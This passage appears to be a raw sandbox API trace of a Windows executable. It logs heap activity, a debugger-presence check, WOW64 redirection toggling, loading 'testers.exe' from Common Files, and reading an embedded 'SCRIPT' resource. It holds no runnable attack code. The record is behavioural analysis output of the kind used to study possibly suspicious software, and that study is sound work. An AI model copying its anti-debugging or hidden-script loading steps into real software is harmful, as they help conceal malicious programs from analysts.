hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8b32d0 | out: hHeap=0x8a0000) returned 1 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6430 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b32d0 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8c57f8 [0150.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c63b8 | out: hHeap=0x8a0000) returned 1 [0150.533] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5368 | out: hHeap=0x8a0000) returned 1 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca678 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5368 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca690 [0150.533] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5378 [0150.534] RtlSizeHeap (HeapHandle=0x8a0000, Flags=0x0, MemoryPointer=0x8c30c0) returned 0x80 [0150.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c63b8 [0150.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca6a8 [0150.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5398 [0150.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca6c0 [0150.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca678 | out: hHeap=0x8a0000) returned 1 [0150.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5368 | out: hHeap=0x8a0000) returned 1 [0150.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca678 [0150.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5368 [0150.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c53a8 [0150.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8caa60 [0150.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c53b8 [0150.534] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca6d8 [0150.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca678 | out: hHeap=0x8a0000) returned 1 [0150.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5368 | out: hHeap=0x8a0000) returned 1 [0150.534] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8b32a0 | out: hHeap=0x8a0000) returned 1 [0150.534] IsDebuggerPresent () returned 0 [0150.534] GetFullPathNameW (in: lpFileName="C:\\PROGRA~2\\COMMON~1\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x85fd30, lpFilePart=0x0 | out: lpBuffer="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpFilePart=0x0) returned 0x20 [0150.534] GetLongPathNameW (in: lpszShortPath="C:\\PROGRA~2\\COMMON~1\\testers.exe", lpszLongPath=0x85fd30, cchBuffer=0x7fff | out: lpszLongPath="C:\\Program Files (x86)\\Common Files\\testers.exe") returned 0x2f [0150.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca5b0 | out: hHeap=0x8a0000) returned 1 [0150.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x8cac80 [0150.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b32a0 [0150.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5368 [0150.535] GetFullPathNameW (in: lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", nBufferLength=0x7fff, lpBuffer=0x85fd00, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files (x86)\\Common Files\\testers.exe", lpFilePart=0x0) returned 0x2f [0150.535] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8b32a0 | out: hHeap=0x8a0000) returned 1 [0150.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x60) returned 0x8cace8 [0150.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6458 [0150.535] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8b32a0 [0150.585] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6480 [0150.586] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c53c8 [0150.586] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0150.587] GetProcAddress (hModule=0x75990000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x759bd650 [0150.587] Wow64DisableWow64FsRedirection (in: OldValue=0x86fc9c | out: OldValue=0x86fc9c*=0x0) returned 1 [0150.587] FreeLibrary (hLibModule=0x75990000) returned 1 [0150.587] CreateFileW (lpFileName="C:\\Program Files (x86)\\Common Files\\testers.exe" (normalized: "c:\\program files (x86)\\common files\\testers.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x86fb38, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0150.587] GetFileType (hFile=0xf8) returned 0x1 [0150.587] LoadLibraryExW (lpLibFileName="C:\\Program Files (x86)\\Common Files\\testers.exe", hFile=0x0, dwFlags=0x2) returned 0x290000 [0150.646] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x75990000 [0150.646] GetProcAddress (hModule=0x75990000, lpProcName="Wow64RevertWow64FsRedirection") returned 0x759bd668 [0150.646] Wow64RevertWow64FsRedirection (OlValue=0x0) returned 1 [0150.646] FreeLibrary (hLibModule=0x75990000) returned 1 [0150.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x8cad50 [0150.646] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c53d8 [0150.646] CreateStreamOnHGlobal (in: hGlobal=0x0, fDeleteOnRelease=1, ppstm=0x86fccc | out: ppstm=0x86fccc*=0x8c64a8) returned 0x0 [0150.647] FindResourceExW (hModule=0x290000, lpType=0xa, lpName="SCRIPT", wLanguage=0x0) returned 0x358528 [0150.647] LoadResource (hModule=0x290000, hResInfo=0x358528) returned 0x3607b8 [0150.647] SizeofResource (hModule=0x290000, hResInfo=0x358528) returned 0x93fa [0150.647] LockResource (hResData=0x3607b8) returned 0x3607b8 [0150.647] ISequentialStream:RemoteWrite (in: This=0x8c64a8, pv=0x3607b8*=0xa3, cb=0x93fa, pcbWritten=0x0 | out: pcbWritten=0x0) returned 0x0 [0150.647] IStream:RemoteSeek (in: This=0x8c64a8, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0150.647] IStream:RemoteSeek (in: This=0x8c64a8, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0150.647] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x8cad50, cb=0x18, pcbRead=0x86fc24 | out: pv=0x8cad50*=0xa3, pcbRead=0x86fc24*=0x18) returned 0x0 [0150.647] IStream:RemoteSeek (in: This=0x8c64a8, dlibMove=0x14, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0150.647] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86fc68, cb=0x4, pcbRead=0x86fc24 | out: pv=0x86fc68*=0x45, pcbRead=0x86fc24*=0x4) returned 0x0 [0150.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c53d8 | out: hHeap=0x8a0000) returned 1 [0150.647] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8cad50 | out: hHeap=0x8a0000) returned 1 [0150.647] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86fc8c, cb=0x10, pcbRead=0x86fc64 | out: pv=0x86fc8c*=0x4d, pcbRead=0x86fc64*=0x10) returned 0x0 [0150.647] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86fb60 | out: lpSystemTimeAsFileTime=0x86fb60*(dwLowDateTime=0x9612a0, dwHighDateTime=0x1d661be)) [0150.648] IStream:RemoteSeek (in: This=0x8c64a8, dlibMove=0x0, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0150.648] IStream:RemoteSeek (in: This=0x8c64a8, dlibMove=0x28, dwOrigin=0x0, plibNewPosition=0x0 | out: plibNewPosition=0x0) returned 0x0 [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86f5e0, cb=0x4, pcbRead=0x86f3a4 | out: pv=0x86f5e0*=0x6b, pcbRead=0x86f3a4*=0x4) returned 0x0 [0150.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f2a0 | out: lpSystemTimeAsFileTime=0x86f2a0*(dwLowDateTime=0x9612a0, dwHighDateTime=0x1d661be)) [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86f5e8, cb=0x4, pcbRead=0x86f3a4 | out: pv=0x86f5e8*=0xa6, pcbRead=0x86f3a4*=0x4) returned 0x0 [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86f3d0, cb=0x34, pcbRead=0x86f3a4 | out: pv=0x86f3d0*=0xe1, pcbRead=0x86f3a4*=0x34) returned 0x0 [0150.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f2a0 | out: lpSystemTimeAsFileTime=0x86f2a0*(dwLowDateTime=0x9612a0, dwHighDateTime=0x1d661be)) [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86f5e8, cb=0x4, pcbRead=0x86f3a4 | out: pv=0x86f5e8*=0x17, pcbRead=0x86f3a4*=0x4) returned 0x0 [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86f614, cb=0x6e, pcbRead=0x86f3a4 | out: pv=0x86f614*=0xf9, pcbRead=0x86f3a4*=0x6e) returned 0x0 [0150.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f2a0 | out: lpSystemTimeAsFileTime=0x86f2a0*(dwLowDateTime=0x9612a0, dwHighDateTime=0x1d661be)) [0150.648] IStream:RemoteSeek (in: This=0x8c64a8, dlibMove=0x1, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86f5d8, cb=0x4, pcbRead=0x86f3a4 | out: pv=0x86f5d8*=0xbc, pcbRead=0x86f3a4*=0x4) returned 0x0 [0150.648] IStream:RemoteSeek (in: This=0x8c64a8, dlibMove=0x18, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86f5e0, cb=0x4, pcbRead=0x86f3a4 | out: pv=0x86f5e0*=0x6b, pcbRead=0x86f3a4*=0x4) returned 0x0 [0150.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f2a0 | out: lpSystemTimeAsFileTime=0x86f2a0*(dwLowDateTime=0x9612a0, dwHighDateTime=0x1d661be)) [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86f5e8, cb=0x4, pcbRead=0x86f3a4 | out: pv=0x86f5e8*=0xaf, pcbRead=0x86f3a4*=0x4) returned 0x0 [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86f3d0, cb=0x26, pcbRead=0x86f3a4 | out: pv=0x86f3d0*=0xe6, pcbRead=0x86f3a4*=0x26) returned 0x0 [0150.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f2a0 | out: lpSystemTimeAsFileTime=0x86f2a0*(dwLowDateTime=0x9612a0, dwHighDateTime=0x1d661be)) [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86f5e8, cb=0x4, pcbRead=0x86f3a4 | out: pv=0x86f5e8*=0x1b, pcbRead=0x86f3a4*=0x4) returned 0x0 [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86f614, cb=0x76, pcbRead=0x86f3a4 | out: pv=0x86f614*=0x6b, pcbRead=0x86f3a4*=0x76) returned 0x0 [0150.648] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f2a0 | out: lpSystemTimeAsFileTime=0x86f2a0*(dwLowDateTime=0x9612a0, dwHighDateTime=0x1d661be)) [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86fc9b, cb=0x1, pcbRead=0x86f5ec | out: pv=0x86fc9b*=0x1, pcbRead=0x86f5ec*=0x1) returned 0x0 [0150.648] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86fc94, cb=0x4, pcbRead=0x86f5ec | out: pv=0x86fc94*=0x86, pcbRead=0x86f5ec*=0x4) returned 0x0 [0150.649] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86fc94, cb=0x4, pcbRead=0x86f5ec | out: pv=0x86fc94*=0xe4, pcbRead=0x86f5ec*=0x4) returned 0x0 [0150.649] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x86fc94, cb=0x4, pcbRead=0x86f5ec | out: pv=0x86fc94*=0x48, pcbRead=0x86f5ec*=0x4) returned 0x0 [0150.649] IStream:RemoteSeek (in: This=0x8c64a8, dlibMove=0x10, dwOrigin=0x0, plibNewPosition=0x1 | out: plibNewPosition=0x1) returned 0x0 [0150.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x27c58) returned 0x8e4168 [0150.649] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x923a) returned 0x8cad50 [0150.649] ISequentialStream:RemoteRead (in: This=0x8c64a8, pv=0x8cad50, cb=0x923a, pcbRead=0x86f5ec | out: pv=0x8cad50*=0x6d, pcbRead=0x86f5ec*=0x923a) returned 0x0 [0150.650] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x86f4e8 | out: lpSystemTimeAsFileTime=0x86f4e8*(dwLowDateTime=0x9612a0, dwHighDateTime=0x1d661be)) [0150.651] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20000) returned 0x90bdc8 [0150.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x92bdd0 [0150.652] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10000) returned 0x93bdd8 [0150.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90bdc8 | out: hHeap=0x8a0000) returned 1 [0150.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x92bdd0 | out: hHeap=0x8a0000) returned 1 [0150.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x93bdd8 | out: hHeap=0x8a0000) returned 1 [0150.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8cad50 | out: hHeap=0x8a0000) returned 1 [0150.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x82e4) returned 0x8cad50 [0150.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1c) returned 0x8c64f8 [0150.659] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c64f8 | out: hHeap=0x8a0000) returned 1 [0150.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c64f8 [0150.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca678 [0150.659] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6520 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca6f0 [0150.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca678 | out: hHeap=0x8a0000) returned 1 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x8ca678 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca708 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c53d8 [0150.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca708 | out: hHeap=0x8a0000) returned 1 [0150.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c53d8 | out: hHeap=0x8a0000) returned 1 [0150.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca678 | out: hHeap=0x8a0000) returned 1 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca678 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1e) returned 0x8c6548 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca708 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6570 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c53d8 [0150.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c6548 | out: hHeap=0x8a0000) returned 1 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca720 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca738 [0150.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca708 | out: hHeap=0x8a0000) returned 1 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca708 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca750 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca768 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca780 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c53e8 [0150.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca750 | out: hHeap=0x8a0000) returned 1 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca750 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca798 [0150.660] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca768 | out: hHeap=0x8a0000) returned 1 [0150.660] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca768 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca7b0 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca7c8 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca7e0 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c53f8 [0150.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca7b0 | out: hHeap=0x8a0000) returned 1 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca7b0 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca7f8 [0150.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca7c8 | out: hHeap=0x8a0000) returned 1 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca7c8 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5408 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca810 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca828 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3058 [0150.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c5408 | out: hHeap=0x8a0000) returned 1 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca840 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca858 [0150.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca810 | out: hHeap=0x8a0000) returned 1 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8b2258 [0150.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8c64f8 | out: hHeap=0x8a0000) returned 1 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca810 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x12) returned 0x8ca5b0 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca870 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c64f8 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8c5408 [0150.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca5b0 | out: hHeap=0x8a0000) returned 1 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca888 [0150.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca8a0 [0150.661] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca870 | out: hHeap=0x8a0000) returned 1 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca870 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xa) returned 0x8ca8b8 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca8d0 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3068 [0150.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8d0 | out: hHeap=0x8a0000) returned 1 [0150.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3068 | out: hHeap=0x8a0000) returned 1 [0150.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8b8 | out: hHeap=0x8a0000) returned 1 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca8b8 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca8d0 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe) returned 0x8ca8e8 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca900 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca918 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3068 [0150.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca8e8 | out: hHeap=0x8a0000) returned 1 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca8e8 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca930 [0150.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca900 | out: hHeap=0x8a0000) returned 1 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca900 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca948 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x8d3440 [0150.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8b2258 | out: hHeap=0x8a0000) returned 1 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca960 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca978 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca990 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca9a8 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3078 [0150.662] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca978 | out: hHeap=0x8a0000) returned 1 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca978 [0150.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8ca9c0 [0150.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca990 | out: hHeap=0x8a0000) returned 1 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca990 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca9d8 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8ca9f0 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xe) returned 0x8caa08 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8caa20 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8caa38 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3088 [0150.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8caa08 | out: hHeap=0x8a0000) returned 1 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8caa08 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d34e0 [0150.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8caa20 | out: hHeap=0x8a0000) returned 1 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8caa20 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d34f8 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3510 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x14) returned 0x8ca5b0 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3528 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8c6548 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8d3098 [0150.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ca5b0 | out: hHeap=0x8a0000) returned 1 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3540 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d3558 [0150.663] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8d3528 | out: hHeap=0x8a0000) returned 1 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3528 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3570 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x8d3588 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d35a0 [0150.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x8d35b8 